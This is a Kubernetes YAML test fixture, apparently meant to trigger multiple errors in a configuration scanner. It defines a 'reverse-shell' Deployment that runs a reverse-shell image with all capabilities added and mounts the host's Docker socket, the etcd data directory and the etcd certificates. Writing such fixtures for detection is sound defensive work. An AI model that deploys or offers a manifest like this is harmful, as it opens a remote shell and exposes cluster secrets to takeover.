services/common/testdata/multipleErrors.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: reverse-shell
  labels:
    app: reverse-shell
spec:
  selector:
    matchLabels:
      app: reverse-shell
      role: master
      tier: backend
  replicas: 1
  template:
    metadata:
      labels:
        app: reverse-shell
        role: master
        tier: backend
    spec:
      containers:
      - name: master
      securityContext:
        capabilities:
          add: ["ALL"]
          volumeMounts:
          - mountPath: /dmnt/docker.sock
            name: docker-sock
          - mountPath: /dmnt/etcd
            name: etcd-dir
          - mountPath: /dmnt/etcd-certs
            name: etcd-certs
          image: docker.io/atticuss/reverse_shell:pythonv3
          resources:
            requests:
              cpu: 100m
              memory: 100Mi
      volumes:
      - name: docker-sock
        hostPath:
          path: /var/run/docker.sock
          type: Socket
      - name: etcd-dir
        hostPath:
          path: /var/lib/etcd
          type: Directory
      - name: etcd-certs
        hostPath:
          path: /etc/kubernetes/pki/etcd
          type: Directory
---
apiVersion: v1
kind: Service
metadata:
  name: reverse-shell
  labels:
    app: reverse-shell
    role: master
    tier: backend
spec:
  selector:
    app: reverse-shell
    role: master
    tier: backend
